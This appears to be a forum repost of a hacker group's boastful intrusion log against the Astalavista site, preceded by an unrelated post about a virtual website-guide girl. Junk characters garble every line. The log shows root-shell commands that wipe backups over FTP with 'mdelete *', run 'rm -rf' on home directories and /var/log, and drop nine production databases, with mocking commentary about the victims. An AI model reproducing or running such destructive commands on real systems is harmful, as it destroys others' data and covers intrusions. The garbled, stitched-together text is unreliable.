" K& ^$ D8 _0 [5 \9 y& l0 Z  T9 _& b  x| Website guidance | Virtual Girl which guides you trought the website.
! w4 w5 x1 }8 H9 G3 |& O
" ~$ h' m! ?" p+ T  e0 U9 lWe need a girl with who you can ( talk )!!!" W4 g# T* k$ A+ }+ ?( r+ p
Also for the News!" d  I' V- Y. d2 [/ U# X6 {
So my suggestion is a girl who read you the news loud if you like!
8 W- r0 G) N6 L' Byou can choose between read yourselfe or she read it for you or both!  m) I0 D2 N, v9 G
; {2 o& }9 w, ~5 V
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!/ V3 h4 v; J9 l! ]2 N. {: n
2 o. R7 A1 `, v2 k) e. ^7 t1 [! O
Have a look on the example girls!!  N9 v. @! i, V9 C7 I: v8 }# i3 D! w
+ v+ B+ n/ n* _& c3 g
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]# u5 f: D- D5 d' i* J
6 f4 Q  J% T: t5 L( |6 t0 e* Z' A
or that
& a& Q. G! @" i  y& S2 ]* @( w
; T1 [+ j; \( ]$ |* u链接标记[url]http://www.yellostrom.de/[/url]8 A4 ^3 Z' M. E$ L

+ x5 x/ i, }3 F|4 ^4 G1 I) u4 v. e
+——————+———————————————————————————————+
. x; q$ B/ h+ z1 row in set (0.00 sec)
& @( i# }. j/ p7 s$ j
- m; n6 Y: x& @" x4 `0 F+ Q& x// ha ha.+ Z5 R" v6 y# }1 N6 s& c

0 Y2 k5 @- R# umysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
) J! S- S. I( k3 S, `# g2 }+————————–+———————————————————————————————————–+6 {( O& i* o$ V- M1 t+ i9 N
| iss_summary              | iss_description                                                                                           |
* b; p# T" K% r+————————–+———————————————————————————————————–+
* v& C5 Q0 E" V4 x| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |& H8 U7 l  d+ S( w9 W( X
+————————–+———————————————————————————————————–+
, p& M) g% ^/ m( N0 ~8 Z' j1 row in set (0.00 sec)) R4 [$ u2 W; R5 p; V  s+ @
  {( d" c/ p* J
// LOL.4 N; S( g; S9 w# B8 a* K+ F
$ E1 E/ _9 O5 ]- Y, \
mysql> exit
" U( ?/ t/ X" }) r9 \. LBye
7 T+ S4 z) {7 c7 D6 P! H/ `. g. i& u
' }3 n8 m4 {- m- m) [$ G5 L" |2 c- Zsh-3.2# ftp 212.254.194.163: d1 _# }3 C9 f! T+ g1 r( `
Connected to 212.254.194.163.
7 V3 }2 Z* @7 F5 l6 [. R220 BackupCOM_VW FTP server ready.
  T* \! t2 z$ N1 c4 b9 q504 AUTH: security mechanism ‘GSSAPI’ not supported.0 G$ O" C# u0 O' c6 O! P6 t
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.; ~2 G& q" ]- N0 |& ?: b
KERBEROS_V4 rejected as an authentication type
9 v6 \9 p) p* h. [. T8 R+ D5 D% NName (212.254.194.163:root): astalavista.com
/ }+ [  \" e+ x331 Password required for astalavista.com.
) w) P1 r( {2 Q: `  YPassword:
1 o' N5 ^3 t* r* }$ `9 S$ A4 Z230 User astalavista.com logged in.
+ s" V- T4 [: d, N' \8 H+ BRemote system type is UNIX.
' U" t+ X1 r; @* `Using binary mode to transfer files.* c# w* n2 \( a" [; J
ftp> ls -la
" ]0 _# l7 n/ a8 X227 Entering Passive Mode (212,254,194,163,2,188)$ }5 Y6 d7 ]7 V/ Y8 s: `' i
150 Opening BINARY mode data connection for ‘file list’.2 w1 \- A7 ~) f+ ?, P) A
dr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
  t! U9 V  O* D* h5 i  C226 Transfer complete.
. S  Q1 l* C: \9 \8 vftp> cd astalavista.com- e6 a' c; g1 W2 [& n( }
250 CWD command successful.7 M* S2 s8 R' L% Q
ftp> ls -la, ?; O1 y& J9 ^
227 Entering Passive Mode (212,254,194,163,2,189)* l$ |. s8 ^4 |0 g0 F0 e. Q
150 Opening BINARY mode data connection for ‘file list’.
% M; I, M- }7 v+ D% l-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar( `; b% h6 q; }- ~2 f; x
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
/ r2 k/ V0 R$ Y! m/ @/ W* ^7 k% m-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2& \3 V  G9 H+ ~+ Y5 \
-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
8 O$ _( K8 t; X-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar
: p; |+ y; _6 w/ Q[snip]7 I& O% t2 F3 |# I
226 Transfer complete.
4 P" }1 b% W- A4 z" [6 Lftp> mdelete *2 w- y3 ^8 m: y
ftp> ls -la. n& v* ]3 Q% o
227 Entering Passive Mode (212,254,194,163,2,193)% A% l  G5 C5 u  U' M2 q$ u4 o) E
150 Opening BINARY mode data connection for ‘file list’.
9 Y7 Q' z. o% T% `226 Transfer complete.' Y; g0 \* B# h2 @/ e6 H
ftp>
, {- J5 R! G0 p. S: B3 R1 H1 a' I4 ?
sh-3.2# cd /home+ u2 @/ r% V$ r; j& l+ @
sh-3.2# ls -la! F3 |6 \" E& |* P) `& b) Y& [
total 120
! e+ ~& [4 z; N, jdrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
* S$ f1 t6 D7 ]# A/ A* ~drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..% I5 a% i$ G# l
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin4 ^/ Y9 L1 K1 b
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group. b/ r. e6 }2 ^+ P( a; W$ Q5 p, S
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
* ?( S! W: U* [* S5 Gdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
5 u& F. I5 }- k; U0 h4 G7 mdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup/ Z, K/ s2 O1 K- C
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.141614 e$ T# l3 ~# p" _$ V
drwx–x–x 10 com     com      4096 Apr 28 12:40 com# {  R1 F. C* L  Z, ]% H; G( J2 K
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp1 S' h$ V1 N! V: h$ i  N( T
drwx——  3 jon     jon      4096 Sep 21  2007 jon7 |& \4 w/ Q  {( j  s/ V6 _8 r
drwx——  2 root    root    16384 Sep 11  2007 lost+found
6 J& b5 R$ k1 v% kdrwxr-xr-x  2 root    root     4096 Sep 14  2007 my
7 o2 G7 [, |* P& adrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata$ h6 `1 `0 Z1 f* K* @1 P8 S
drwx——  2 jon     jon      4096 Sep 15  2007 test
* W- ?" w. N& F/ h$ k# a3 Zdrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
9 Y5 L' C/ e: q+ G5 u9 \# O( Q) K
2 u$ W+ B5 `/ H" H2 B6 x0 |6 Ush-3.2# rm -rf backup/
: U3 }+ C2 V' r: \# x* lsh-3.2# rm -rf backup.14161/
0 g1 C8 a+ F/ j6 Q) Tsh-3.2# rm -rf ftp/3 Z/ a: R( U: Z3 G& o$ w: J
sh-3.2# rm -rf jon/
7 N7 ^+ x2 o" P4 M# p, Psh-3.2# rm -rf my/
) J; i9 j$ g$ \2 X, i/ Ush-3.2# rm -rf mysqldata/
2 u  x  B4 ~) q4 |( }2 ]sh-3.2# rm -rf test/
4 T  S$ R" l% O9 M# H+ ush-3.2# rm -rf tmp/
4 G2 l5 f+ ^/ P- k3 `: U- j9 Rsh-3.2# cd ~
6 l/ z" F! A- {* P, S9 m- h4 Nsh-3.2# rm -rf *
9 v6 I+ X% q( r" h1 {6 k, C" psh-3.2# rm -rf /var/log/6 S$ P1 K6 i& Z( a# X6 F7 m
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
) `  r* A6 O# rsh-3.2# rm -rf /home/*
& w5 V, f" p4 z  ~6 t3 E$ fsh-3.2# mysql
! u; c% {  y6 J8 P4 a" W+ ?Welcome to the MySQL monitor.  Commands end with ; or \g.; s' t1 m# }& q: j6 a4 @
Your MySQL connection id is 407156- H9 r2 x- S8 `6 o" B  P5 t, L' I2 r
Server version: 5.0.45-community-log MySQL Community Edition (GPL)( v# g' g3 d  l! ~* A  |8 I- v

1 x+ a' }$ T# I9 L4 t+ NType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
9 a+ |9 I- I; [! n) L7 E& ?
0 c- R; L. \' e' V9 D' ?mysql> show databases;
( x; {- f6 j& C7 r0 {- t+———————–+
! Z* N9 j9 ~/ I/ ~9 {0 u3 r3 P: H. {| Database              |
: p6 B& o3 M$ C$ n' R) j+———————–+
) R! p+ d; A: T1 C8 e| information_schema    |
# S1 Y. B  B) \, h. Q2 I9 c6 e| astanet_ads           |* t: N4 F& ?$ E# [8 G! u
| astanet_mailing_lists |+ d. E+ b, Z. I! J0 ~! e
| astanet_mediawiki     |
% l. u0 P, t8 y7 j| astanet_membersystem  |8 m9 K6 c, `0 e! C
| com_contrexx          |- i) `6 Z% j  K2 l# f. S/ c  H
| com_contrexx2         |2 q5 U* H8 k' G/ Z4 \
| com_contrexx2_live    |
/ u0 x+ l& r, K, [3 n1 k4 W# k| da_roundcube          |
* s) N! w9 T+ J, L7 i| dolphin               |( H, w* Y7 E2 |+ y! Q4 q* i
| ideapool              |) ?5 d8 K! K+ b/ G* o. ]$ C
| mysql                 |( y) y' J# y* p/ z  V5 N
| test                  |: a6 J6 a: H; s+ Q/ q+ w. k# d" \
| yourmaster            |' r$ c# f& i, V
+———————–+
  v9 G& u% m# c; h. m7 |- P9 s14 rows in set (0.03 sec)
3 O5 w6 Y; t+ j/ P8 ]$ ~; d& k0 T3 W0 t8 ~
mysql> drop database astanet_membersystem;
: Z2 S7 p% R" X5 X* w5 x3 tdroQuery OK, 46 rows affected (0.81 sec)
6 P2 V3 p' |3 U, \. v
% ^1 d6 ]8 e: Mmysql> drop database com_contrexx;
& M3 N' O8 x2 tQuery OK, 211 rows affected (2.72 sec)) U- p& @7 i2 F% L
3 b  |) M3 @/ A3 Y) C2 J+ B7 k- u
mysql> drop database com_contrexx2;
, o0 v/ A5 i' b4 E2 B1 \9 QQuery OK, 237 rows affected (2.23 sec)
- p$ Y  ^' _7 P9 i2 Q( N. I$ H6 E  U* R3 S! Q* _+ x; k( j1 Q
mysql> drop database com_contrexx2_live;
& {2 n& f9 D% D) S- q" E9 @8 CQuery OK, 227 rows affected (7.63 sec)
4 u& y$ v1 [% p! B/ j
4 \6 h- g$ U6 O! ]! {) hmysql> drop database ideapool;1 v0 {. F7 u6 n( ?" Y' B- ^( N+ J
Query OK, 69 rows affected (0.19 sec); V7 B6 R9 x* L) g5 V$ j. ^6 U

  M. F! f' U9 |2 b4 n3 xmysql> drop database yourmaster;1 t: e: C; Z4 z/ w6 S
Query OK, 158 rows affected (0.55 sec)
; e2 Z! H1 V) J9 e! j1 C' L6 z  }, G* y# n8 h/ E
mysql> drop database astanet_ads;0 E+ b  V- _& q7 _( N
Query OK, 9 rows affected (0.11 sec)
; x. x% W, M1 k9 b) T" j& g% M6 F0 A' b8 K5 K( j  }- n. m  ^
mysql> drop database astanet_mailing_lists;( O/ G2 m8 E. l3 |3 B
Query OK, 24 rows affected (1.47 sec): ~7 o0 m" d% N

' K5 M% N/ \; Z' Hmysql> drop database astanet_mediawiki;3 Q6 ^# H" M: g! y; @
Query OK, 31 rows affected (0.51 sec)4 Q  ~7 H9 @6 B% L. E
+ ~' h1 G3 ^" w: I" Z
mysql> show databases;
' O. h$ L+ b9 y+——————–+
' n3 u8 ^6 W: [7 g  X' Q/ `7 M| Database           |0 l3 F! c: u% M- W) |# t
+——————–+
  T" C2 P4 U, z5 R| information_schema |9 L% j: c* b9 ?% M" J, r) {
| da_roundcube       |; [& {# [7 Z  [
| dolphin            |/ S6 k9 ^6 K  w; h( o
| mysql              |
' w5 _# d: L% o| test               |
! D* Z5 v* Z; |+——————–+
/ P3 e% u( D  U5 u5 rows in set (0.00 sec)% k( n8 |2 O1 Z
/ T: s/ M9 W1 ?" ]- x* R% u
What a journey! We’re not sure exactly why the “Terminator” had any influence on
: X7 F( q, f5 x* }: e& s. [their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
+ C% m8 P7 v+ O/ ^4 o" `4 twrong to say this pack of morons *wont be back*.
( H- \  I% v- }, Z! j2 y5 j



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2